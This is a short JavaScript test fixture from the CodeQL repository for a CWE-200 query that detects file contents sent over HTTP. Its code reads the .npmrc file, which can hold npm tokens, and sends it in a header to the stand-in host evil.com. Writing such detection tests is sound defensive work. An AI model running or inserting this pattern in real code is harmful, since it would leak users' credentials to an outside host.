Files
codeql/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
2018-12-05 13:12:52 +00:00

11 lines
223 B
JavaScript

var fs = require("fs"),
https = require("https");
var content = fs.readFileSync(".npmrc", "utf8");
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: content }
}, () => { });